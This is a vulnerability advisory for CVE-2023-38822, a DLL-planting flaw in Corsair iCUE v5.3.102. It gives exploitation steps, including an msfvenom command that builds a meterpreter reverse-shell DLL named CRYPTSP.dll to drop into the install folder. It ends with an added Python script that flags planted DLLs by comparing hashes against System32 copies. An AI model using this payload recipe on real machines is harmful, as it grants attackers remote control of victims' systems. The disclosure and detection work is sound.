DLL Planting in the Corsair iCUE v.5.3.102
CVE-2023-38822
Discoverer: Idan Malihi
An issue in Corsair iCUE v.5.3.102 allows a local attacker to execute arbitrary code via the MPDC.dll, CRYPTSP.dll, dcomp.dll, profapi.dll, and MSASN1.dll components.
To exploit the DLL Planting vulnerability, an attacker should take the following steps:
- Download iCUE's latest version.
- Install the iCUE product.
- Open the installation path folder, for example, C:\Program Files\Corsair\Corsair iCUE5 Software\
- Create a malicious dll file with msfvenom on Kali Linux OS: msfvenom -p windows/x64/meterpreter/shell_reverse_tcp LHOST=IP LPORT=PORT -f dll -o CRYPTSP.dll
- Transfer the DLL file to the iCUE installation path C:\Program Files\Corsair\Corsair iCUE5 Software\
- Run the iCUE.exe and get a reverse shell.
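
A defender-side check for the condition described above, as an added example that is not part of the original advisory: it looks in the application directory for any of the five DLL names the advisory lists and compares each hit against the copy in the system directory. The function name, the status labels and the use of `C:\Windows\System32` as the reference directory are assumptions of this example.

```python
import hashlib
from pathlib import Path

# DLL names listed in the advisory for CVE-2023-38822.
ADVISORY_DLLS = ["MPDC.dll", "CRYPTSP.dll", "dcomp.dll", "profapi.dll", "MSASN1.dll"]


def sha256_of(path):
    """Hash a file in chunks so large DLLs are not read into memory at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def find_planted_dlls(app_dir, system_dir, names=ADVISORY_DLLS):
    """Return findings for advisory-named DLLs sitting next to the executable.

    Only the top level of app_dir is checked, because that is where the
    page's steps place the file. Windows file names are case-insensitive,
    so names are compared in lower case.
    """
    if not Path(app_dir).is_dir():
        return []
    wanted = {name.lower() for name in names}
    system_copies = {}
    if Path(system_dir).is_dir():
        system_copies = {p.name.lower(): p for p in Path(system_dir).iterdir() if p.is_file()}
    findings = []
    for entry in sorted(Path(app_dir).iterdir()):
        if not entry.is_file() or entry.name.lower() not in wanted:
            continue
        reference = system_copies.get(entry.name.lower())
        if reference is None:
            status = "no-system-copy"       # nothing to compare against; review by hand
        elif sha256_of(entry) == sha256_of(reference):
            status = "matches-system"       # redundant copy of the system DLL
        else:
            status = "differs-from-system"  # content differs: strongest indicator
        findings.append({"path": str(entry), "status": status, "sha256": sha256_of(entry)})
    return findings


if __name__ == "__main__":
    # Install path taken from the advisory; system directory is an assumed default.
    app = r"C:\Program Files\Corsair\Corsair iCUE5 Software"
    for finding in find_planted_dlls(app, r"C:\Windows\System32"):
        print(finding["status"], finding["path"], finding["sha256"])
```

Any hit is worth reviewing, since the vendor may ship its own copy of a library; a file whose hash differs from the system copy should also have its signature and creation time checked.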